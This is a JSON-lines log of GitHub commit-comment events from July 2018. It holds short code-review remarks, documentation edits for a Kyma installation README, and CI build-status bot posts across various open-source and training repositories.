{"id":"8022234155","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842666,"position":4,"line":61,"path":"tiledb/sm/query/query.cc","commit_id":"cf7f3ee5ffd31281613e9766037dfc959b0eecfc","created_at":"2018-07-26T11:56:27Z","updated_at":"2018-07-26T11:56:27Z","author_association":"CONTRIBUTOR","body":"Probably need to follow rule of 5 from now on for all objects (that has been my omission as well)."}},"created_at":"2018-07-26T11:56:27Z"}
{"id":"8022234734","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29842668,"position":null,"line":null,"path":null,"commit_id":"5e2881d79eb2d44401a0467fccf33c7d8bf45982","created_at":"2018-07-26T11:56:35Z","updated_at":"2018-07-26T11:56:35Z","author_association":"NONE","body":"any explanation of the changes?"}},"created_at":"2018-07-26T11:56:35Z"}
{"id":"8022241079","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29842682,"position":null,"line":null,"path":null,"commit_id":"f29e39dbf3658fc71570ba4d4eacbcc56279a105","created_at":"2018-07-26T11:58:00Z","updated_at":"2018-07-26T11:58:00Z","author_association":"OWNER","body":"Actually, it would have made sense to not rename it, and just have `MayHaveUnit` take over the name `getUnit` for this purpose!"}},"created_at":"2018-07-26T11:58:00Z"}
{"id":"8022242337","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29842686,"position":null,"line":null,"path":null,"commit_id":"0d9460aca2f6ce42a569b16a34e0b6191eeee403","created_at":"2018-07-26T11:58:16Z","updated_at":"2018-07-26T11:58:16Z","author_association":"COLLABORATOR","body":"山本　指摘\r\n・タイムアウトが、どういったときにタイムアウトとなるかを具体的に記述してください\r\n・変数定義waiting_time のコメントが抜けています。"}},"created_at":"2018-07-26T11:58:16Z"}
{"id":"8022244370","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29842694,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T11:58:40Z","updated_at":"2018-07-26T11:58:40Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2342 of 2342 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T11:58:40Z"}
{"id":"8022244621","type":"CommitCommentEvent","actor":{"login":"gabrielhsantos"},"repo":{"name":"gabrielhsantos/github-master"},"payload":{"comment":{"id":29842695,"position":5,"line":15,"path":"sobre.html","commit_id":"cda3704ecf12daea2dfe894d08e3e11071d503ef","created_at":"2018-07-26T11:58:43Z","updated_at":"2018-07-26T11:58:43Z","author_association":"OWNER","body":"@gabrielhsantos inserir o tel tmbm"}},"created_at":"2018-07-26T11:58:43Z"}
{"id":"8022246756","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842701,"position":2,"line":2,"path":"test/src/unit-capi-rest.cc","commit_id":"59670a2e550137374db82e9045d30671d033295a","created_at":"2018-07-26T11:59:09Z","updated_at":"2018-07-26T11:59:09Z","author_association":"CONTRIBUTOR","body":"Fix name."}},"created_at":"2018-07-26T11:59:09Z"}
{"id":"8022247902","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29842707,"position":null,"line":null,"path":null,"commit_id":"4588b2b263d654a22e1d3584ddc8aa8877591bb0","created_at":"2018-07-26T11:59:24Z","updated_at":"2018-07-26T11:59:24Z","author_association":"OWNER","body":"As I read this, I really think we should stay with the name `getUnit`... sorry!"}},"created_at":"2018-07-26T11:59:24Z"}
{"id":"8022248228","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842709,"position":31,"line":31,"path":"test/src/unit-capi-rest.cc","commit_id":"59670a2e550137374db82e9045d30671d033295a","created_at":"2018-07-26T11:59:28Z","updated_at":"2018-07-26T11:59:28Z","author_association":"CONTRIBUTOR","body":"Fix description"}},"created_at":"2018-07-26T11:59:28Z"}
{"id":"8022253278","type":"CommitCommentEvent","actor":{"login":"jeungmin717"},"repo":{"name":"jeungmin717/DataStudy"},"payload":{"comment":{"id":29842722,"position":null,"line":null,"path":null,"commit_id":"d8ed08fb2a3269a0e6653486305c682609117458","created_at":"2018-07-26T12:00:30Z","updated_at":"2018-07-26T12:00:30Z","author_association":"OWNER","body":"changed name"}},"created_at":"2018-07-26T12:00:30Z"}
{"id":"8022258817","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842736,"position":39,"line":1370,"path":"tiledb/sm/c_api/tiledb.cc","commit_id":"59670a2e550137374db82e9045d30671d033295a","created_at":"2018-07-26T12:01:41Z","updated_at":"2018-07-26T12:01:41Z","author_association":"CONTRIBUTOR","body":"This is exactly what I had in mind! :)"}},"created_at":"2018-07-26T12:01:41Z"}
{"id":"8022262901","type":"CommitCommentEvent","actor":{"login":"Hana33"},"repo":{"name":"sommer/veins"},"payload":{"comment":{"id":29842743,"position":null,"line":null,"path":null,"commit_id":"493f8a3f514bd8ffd7fb5d9666a952a4446ab177","created_at":"2018-07-26T12:02:33Z","updated_at":"2018-07-26T12:02:33Z","author_association":"NONE","body":"I run the example of connectivityMap in Castalia, it brings me this error \r\n\r\n\"Cannot evaluate parameter 'packetSpacing': (omnetpp::cIntParImpl)packetSpacing: Cannot cast from type integer to double -- in module (ConnectivityMap) SN.node[1].Application (id=25), at t=0.003536244016s, event #13\" . \r\n\r\nI thought I should look at _SensorNetwork.ned_ file where the parameters of the module are of type **double** , this is why I was asking about your propsed solution in the case of Castalia"}},"created_at":"2018-07-26T12:02:33Z"}
{"id":"8022266942","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29842764,"position":2,"line":3,"path":"lesson2/10_100.rb","commit_id":"b52bd02821cca51ba83fe4521b1313f749414a51","created_at":"2018-07-26T12:03:21Z","updated_at":"2018-07-26T12:03:21Z","author_association":"NONE","body":"нет необходимости создавать отдельный массив и пушить в него элементы по одному. `numbers_range.step(5)` уже вернет нам Range с нужными нам числами. Остается просто его конвертировать в массив с помощью метода to_a\r\n```\r\n(10..100).step(5).to_a\r\n```"}},"created_at":"2018-07-26T12:03:21Z"}
{"id":"8022268943","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29842772,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T12:03:47Z","updated_at":"2018-07-26T12:03:47Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T12:03:47Z"}
{"id":"8022269527","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29842775,"position":null,"line":null,"path":null,"commit_id":"a97832fc2da03a8e9807b516879b0cced0cc22cd","created_at":"2018-07-26T12:03:55Z","updated_at":"2018-07-26T12:03:55Z","author_association":"NONE","body":"@xuedong if you want higher quality figures (for your pdf report), you can save the plots in eps or PDF format, usually it helps!"}},"created_at":"2018-07-26T12:03:55Z"}
{"id":"8022269576","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842776,"position":3,"line":3,"path":"tiledb/rest/curl.h","commit_id":"59670a2e550137374db82e9045d30671d033295a","created_at":"2018-07-26T12:03:56Z","updated_at":"2018-07-26T12:03:56Z","author_association":"CONTRIBUTOR","body":"We can't use a GPL license!!"}},"created_at":"2018-07-26T12:03:56Z"}
{"id":"8022275498","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29842792,"position":19,"line":173,"path":"src/kl_functions.jl","commit_id":"681f92a1b28eb08e88e5a08d58f118140342ce85","created_at":"2018-07-26T12:05:12Z","updated_at":"2018-07-26T12:05:12Z","author_association":"NONE","body":"@xuedong from this `kl_functions.jl` file, if you want we could improve my http://github.com/Naereen/KullbackLeibler.jl and publish it \"together\", if you are interested?"}},"created_at":"2018-07-26T12:05:12Z"}
{"id":"8022276148","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29842794,"position":null,"line":null,"path":null,"commit_id":"531e52d99d04d41a9a7b302597345651b5463679","created_at":"2018-07-26T12:05:19Z","updated_at":"2018-07-26T12:05:19Z","author_association":"OWNER","body":"Let me know if test is set up properly."}},"created_at":"2018-07-26T12:05:19Z"}
{"id":"8022276560","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29842797,"position":null,"line":null,"path":null,"commit_id":"ba0794a794627df0e597716a7940d3802c0fc3f0","created_at":"2018-07-26T12:05:22Z","updated_at":"2018-07-26T12:05:22Z","author_association":"CONTRIBUTOR","body":"uwu"}},"created_at":"2018-07-26T12:05:22Z"}
{"id":"8022280757","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842801,"position":8,"line":7,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:06:16Z","updated_at":"2018-07-26T12:06:16Z","author_association":"NONE","body":"> **NOTE:** The remainder of this section assumes you have access to a running cluster.\r\nTo install Kyma, you will need the following data:\r\n"}},"created_at":"2018-07-26T12:06:16Z"}
{"id":"8022283025","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29842808,"position":8,"line":6,"path":"lesson2/buyers_list.rb","commit_id":"b52bd02821cca51ba83fe4521b1313f749414a51","created_at":"2018-07-26T12:06:47Z","updated_at":"2018-07-26T12:06:47Z","author_association":"NONE","body":"Индентация уехала в 5 и 6 строках"}},"created_at":"2018-07-26T12:06:47Z"}
{"id":"8022283297","type":"CommitCommentEvent","actor":{"login":"PetteriM1"},"repo":{"name":"Nukkit-coders/MobPlugin"},"payload":{"comment":{"id":29842810,"position":null,"line":null,"path":null,"commit_id":"8b7f41b7ffbeb2dc11cf4c7dd8d3679477e33da0","created_at":"2018-07-26T12:06:50Z","updated_at":"2018-07-26T12:06:50Z","author_association":"MEMBER","body":"This helps nothing cause explosion still breaks cobblestone"}},"created_at":"2018-07-26T12:06:50Z"}
{"id":"8022287757","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29842821,"position":16,"line":49,"path":"src/arms.jl","commit_id":"681f92a1b28eb08e88e5a08d58f118140342ce85","created_at":"2018-07-26T12:07:45Z","updated_at":"2018-07-26T12:07:45Z","author_association":"NONE","body":"@xuedong I'm curious to know if this case on a string is efficient or not (these functions get called a lot right? so it could matter).\r\nI think in Julia you could use some Enumeration *type* and then let the polymorphic multiple-dispatch of Julia handle the cases in an automatic and more efficient way. (see https://simonensemble.github.io/computer%20programming/2018/03/28/multiple-dispatch/ or https://www.quora.com/Julia-programming-language-What-are-the-advantages-of-multiple-dispatch?share=1)"}},"created_at":"2018-07-26T12:07:45Z"}
{"id":"8022290661","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842831,"position":11,"line":10,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:08:25Z","updated_at":"2018-07-26T12:08:25Z","author_association":"NONE","body":"Wildcard TLS certificate for your cluster domain (can be generated with Let's Encrypt) "}},"created_at":"2018-07-26T12:08:25Z"}
{"id":"8022291062","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842833,"position":12,"line":11,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:08:31Z","updated_at":"2018-07-26T12:08:31Z","author_association":"NONE","body":"Remote Environments (typo in 'environments')"}},"created_at":"2018-07-26T12:08:31Z"}
{"id":"8022291368","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842834,"position":13,"line":12,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:08:34Z","updated_at":"2018-07-26T12:08:34Z","author_association":"NONE","body":"Kyma Ingress (capitalize)"}},"created_at":"2018-07-26T12:08:34Z"}
{"id":"8022291756","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842835,"position":14,"line":13,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:08:38Z","updated_at":"2018-07-26T12:08:38Z","author_association":"NONE","body":"Remote Environments Ingress (typo in 'environments' + capitalize)"}},"created_at":"2018-07-26T12:08:38Z"}
{"id":"8022292060","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842837,"position":18,"line":17,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:08:42Z","updated_at":"2018-07-26T12:08:42Z","author_association":"NONE","body":"API Server is configured in the following manner:"}},"created_at":"2018-07-26T12:08:42Z"}
{"id":"8022292346","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842839,"position":38,"line":37,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:08:46Z","updated_at":"2018-07-26T12:08:46Z","author_association":"NONE","body":"The `kyma-installer` namespace"}},"created_at":"2018-07-26T12:08:46Z"}
{"id":"8022292993","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842844,"position":40,"line":39,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:08:54Z","updated_at":"2018-07-26T12:08:54Z","author_association":"NONE","body":"Create the `kyma-installer` namespace by executing the following command:\r\n`kubectl create ns kyma-installer`"}},"created_at":"2018-07-26T12:08:54Z"}
{"id":"8022295196","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842852,"position":42,"line":41,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:09:24Z","updated_at":"2018-07-26T12:09:24Z","author_association":"NONE","body":"The `installer-config.yaml.tpl` template"}},"created_at":"2018-07-26T12:09:24Z"}
{"id":"8022295251","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-yokomizo/meikaiJAVA_yokomizo"},"payload":{"comment":{"id":29842853,"position":55,"line":55,"path":"DDT-work/java13/test/E13_02.java","commit_id":"e70b4fd1f567b3257dd486effb4febff001f323f","created_at":"2018-07-26T12:09:25Z","updated_at":"2018-07-26T12:09:25Z","author_association":"COLLABORATOR","body":"山本　意見（修正が必要なわけではない）\r\n「number」ディレクトリに定数クラスがあるので、\r\nある程度の定数がまとめられているものがあれば、そちらにまとめて記載するほうが、統一がとれてよいと思います。\r\n今後はそういったことも視野に入れてみてください。"}},"created_at":"2018-07-26T12:09:25Z"}
{"id":"8022295836","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842856,"position":44,"line":43,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:09:33Z","updated_at":"2018-07-26T12:09:33Z","author_association":"NONE","body":"The Kyma installation process requires installation data specified in the `installer-config.yaml` file. Copy the `installer-config.yaml.tpl` template, rename it to `installer-config.yaml`, and fill in the placeholders."}},"created_at":"2018-07-26T12:09:33Z"}
{"id":"8022296991","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842857,"position":50,"line":49,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:09:48Z","updated_at":"2018-07-26T12:09:48Z","author_association":"NONE","body":"Ingress (capitalize)"}},"created_at":"2018-07-26T12:09:48Z"}
{"id":"8022297013","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29842858,"position":23,"line":18,"path":"lesson2/date.rb","commit_id":"b52bd02821cca51ba83fe4521b1313f749414a51","created_at":"2018-07-26T12:09:48Z","updated_at":"2018-07-26T12:09:48Z","author_association":"NONE","body":"да, или можно было сразу day отдать методу sum аргументом. Он тогда бы использовался как начальное значение. Да и если в получении отрезка использовать month - 1, то проверки с 13 по 16 строку можно было бы вообще избежать. То есть\r\n```\r\nmonth.frist(month - 1).sum(day) \r\n```\r\nЭто все решение"}},"created_at":"2018-07-26T12:09:48Z"}
{"id":"8022297333","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842859,"position":51,"line":50,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:09:52Z","updated_at":"2018-07-26T12:09:52Z","author_association":"NONE","body":"...for the domain name (article)"}},"created_at":"2018-07-26T12:09:52Z"}
{"id":"8022297639","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842860,"position":52,"line":51,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:09:56Z","updated_at":"2018-07-26T12:09:56Z","author_association":"NONE","body":"Ingress (capitalize)"}},"created_at":"2018-07-26T12:09:56Z"}
{"id":"8022297892","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842862,"position":53,"line":52,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:10:00Z","updated_at":"2018-07-26T12:10:00Z","author_association":"NONE","body":"API server's URL ~~of your cluster~~"}},"created_at":"2018-07-26T12:10:00Z"}
{"id":"8022298125","type":"CommitCommentEvent","actor":{"login":"JanTvrdik"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":29842864,"position":16,"line":311,"path":"src/Tracy/Debugger.php","commit_id":"fa3dabf3a329983feb8fadf185d057b4cd2e3e69","created_at":"2018-07-26T12:10:03Z","updated_at":"2018-07-26T12:10:03Z","author_association":"CONTRIBUTOR","body":"Sorry, you're right."}},"created_at":"2018-07-26T12:10:03Z"}
{"id":"8022299547","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842869,"position":55,"line":54,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:10:20Z","updated_at":"2018-07-26T12:10:20Z","author_association":"NONE","body":"Placeholder for additional admin group (optional)"}},"created_at":"2018-07-26T12:10:20Z"}
{"id":"8022300683","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842871,"position":57,"line":56,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:10:35Z","updated_at":"2018-07-26T12:10:35Z","author_association":"NONE","body":"Once all the required placeholders are filled in, run the following command to provide the cluster with the installation data:\r\n`kubectl apply -f installer-config.yaml`"}},"created_at":"2018-07-26T12:10:35Z"}
{"id":"8022301862","type":"CommitCommentEvent","actor":{"login":"mightyCelu"},"repo":{"name":"sommer/veins"},"payload":{"comment":{"id":29842877,"position":null,"line":null,"path":null,"commit_id":"493f8a3f514bd8ffd7fb5d9666a952a4446ab177","created_at":"2018-07-26T12:10:51Z","updated_at":"2018-07-26T12:10:51Z","author_association":"NONE","body":"This seems to be an issue in Castalia, so I propose you open a bug report on their GitHub page or a StackOverflow question.\r\n\r\nThe issue might be related recent to changes in OMNeT++'s parameter API, which reworked how the parameters can be cast. Also, in the _SensorNetwork_ module there are no double parameters."}},"created_at":"2018-07-26T12:10:51Z"}
{"id":"8022302007","type":"CommitCommentEvent","actor":{"login":"hal200"},"repo":{"name":"hal200/imdb-RNN"},"payload":{"comment":{"id":29842879,"position":null,"line":null,"path":null,"commit_id":"d044b4a61551a1288a3cdd48955eb4c02de6134e","created_at":"2018-07-26T12:10:52Z","updated_at":"2018-07-26T12:10:52Z","author_association":"OWNER","body":".."}},"created_at":"2018-07-26T12:10:52Z"}
{"id":"8022302408","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842881,"position":59,"line":58,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:10:57Z","updated_at":"2018-07-26T12:10:57Z","author_association":"NONE","body":"Deploying the `Installer` component"}},"created_at":"2018-07-26T12:10:57Z"}
{"id":"8022304053","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29842884,"position":16,"line":38,"path":"src/BestArm.jl","commit_id":"3fb2930d245ac2963b7f37cec3e9234764f88f24","created_at":"2018-07-26T12:11:18Z","updated_at":"2018-07-26T12:11:18Z","author_association":"NONE","body":"@xuedong it could be a good practice to write code independent of the platform. I'm pretty sure this \"/\" does not work on Windows, for instance.\r\nThe function [`Base.Filesystem.joinpath`](https://docs.julialang.org/en/latest/base/file/#Base.Filesystem.joinpath) from std library is designed for this (like `os.path.join` in Python)"}},"created_at":"2018-07-26T12:11:18Z"}
{"id":"8022305136","type":"CommitCommentEvent","actor":{"login":"jpmaHub"},"repo":{"name":"Renny4Real/tic_tac_toe"},"payload":{"comment":{"id":29842885,"position":6,"line":6,"path":"lib/check_board.rb","commit_id":"0275a52059132b66118048df618bc4808cfedf81","created_at":"2018-07-26T12:11:32Z","updated_at":"2018-07-26T12:11:32Z","author_association":"COLLABORATOR","body":"Does @status variable used in somewhere in the class? "}},"created_at":"2018-07-26T12:11:32Z"}
{"id":"8022305363","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29842886,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T12:11:35Z","updated_at":"2018-07-26T12:11:35Z","author_association":"NONE","body":"Yargh, copying! Could we just populate the state map on demand? Otherwise we'll probably have to return some kind of simple refcounted object to differentiate the belongs-to-state-map and belongs-to-caller cases."}},"created_at":"2018-07-26T12:11:35Z"}
{"id":"8022307230","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842889,"position":61,"line":60,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:11:59Z","updated_at":"2018-07-26T12:11:59Z","author_association":"NONE","body":"To deploy the `Installer` component on your cluster, run the following command:\r\n```\r\nkubectl apply -f installation/resources/installer.yaml -n kyma-installer\r\n```"}},"created_at":"2018-07-26T12:11:59Z"}
{"id":"8022309976","type":"CommitCommentEvent","actor":{"login":"fblanqui"},"repo":{"name":"rlepigre/lambdapi"},"payload":{"comment":{"id":29842895,"position":null,"line":null,"path":null,"commit_id":"0efb25e7e1d7d407541cae6e9be7f18164e0de53","created_at":"2018-07-26T12:12:34Z","updated_at":"2018-07-26T12:12:34Z","author_association":"COLLABORATOR","body":"Right. I'm going to fix it.\n\n\nLe 26/07/2018 à 13:22, Rodolphe Lepigre a écrit :\n>\n> You should not do that, this line is for the binary file (which is not \n> a folder). The library folder is removed by the |ocamlfind| command. \n> Note that you may need to remove it by hand if it was not installed \n> properly the first time.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/rlepigre/lambdapi/commit/0efb25e7e1d7d407541cae6e9be7f18164e0de53#commitcomment-29842262>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AKWYmT2zaQM9mfd22kEUf85iioFB_AjHks5uKaZsgaJpZM4VhpFf>.\n>\n\n"}},"created_at":"2018-07-26T12:12:34Z"}
{"id":"8022310035","type":"CommitCommentEvent","actor":{"login":"jpmaHub"},"repo":{"name":"Renny4Real/tic_tac_toe"},"payload":{"comment":{"id":29842896,"position":103,"line":90,"path":"lib/check_board.rb","commit_id":"0275a52059132b66118048df618bc4808cfedf81","created_at":"2018-07-26T12:12:35Z","updated_at":"2018-07-26T12:12:35Z","author_association":"COLLABORATOR","body":"Should this code variable be renamed as @status? "}},"created_at":"2018-07-26T12:12:35Z"}
{"id":"8022312974","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29842904,"position":78,"line":34,"path":"src/fixed_confidence/track_stop.jl","commit_id":"78b5441066e637bc6524cd4d17f5af011bad140c","created_at":"2018-07-26T12:13:12Z","updated_at":"2018-07-26T12:13:12Z","author_association":"NONE","body":"@xuedong this looks oddly specific, is it a hack or a bug or ?"}},"created_at":"2018-07-26T12:13:12Z"}
{"id":"8022313256","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29842905,"position":5,"line":69,"path":"src/goto-analyzer/static_simplifier.cpp","commit_id":"7fde00be0f5616fe618c133ff3fb2eb777883549","created_at":"2018-07-26T12:13:16Z","updated_at":"2018-07-26T12:13:16Z","author_association":"NONE","body":"Smash this commit into the previous I'd say -- ideally after any individual commit the thing should compile, for `bisect` et al."}},"created_at":"2018-07-26T12:13:16Z"}
{"id":"8022315120","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842910,"position":63,"line":62,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:13:39Z","updated_at":"2018-07-26T12:13:39Z","author_association":"NONE","body":"Trigger the installation"}},"created_at":"2018-07-26T12:13:39Z"}
{"id":"8022315779","type":"CommitCommentEvent","actor":{"login":"Pepoitdog"},"repo":{"name":"Pepoitdog/NestedLab1"},"payload":{"comment":{"id":29842912,"position":3,"line":3,"path":"Deploy nested esxi cluster func.ps1","commit_id":"406282cbd1f171b2caf2971850845809d4251211","created_at":"2018-07-26T12:13:48Z","updated_at":"2018-07-26T12:13:48Z","author_association":"OWNER","body":"BLAAAAAME"}},"created_at":"2018-07-26T12:13:48Z"}
{"id":"8022316711","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29842919,"position":6,"line":596,"path":"src/analyses/constant_propagator.cpp","commit_id":"7aca753693f1000e1009d311eb95100246241556","created_at":"2018-07-26T12:13:59Z","updated_at":"2018-07-26T12:13:59Z","author_association":"NONE","body":"Operator spacing while you're changing it"}},"created_at":"2018-07-26T12:13:59Z"}
{"id":"8022320305","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29842926,"position":13,"line":46,"path":"src/analyses/ai.h","commit_id":"574f29c7d0e1372dec405efe6c720ee337351052","created_at":"2018-07-26T12:14:44Z","updated_at":"2018-07-26T12:14:44Z","author_association":"NONE","body":"sp"}},"created_at":"2018-07-26T12:14:44Z"}
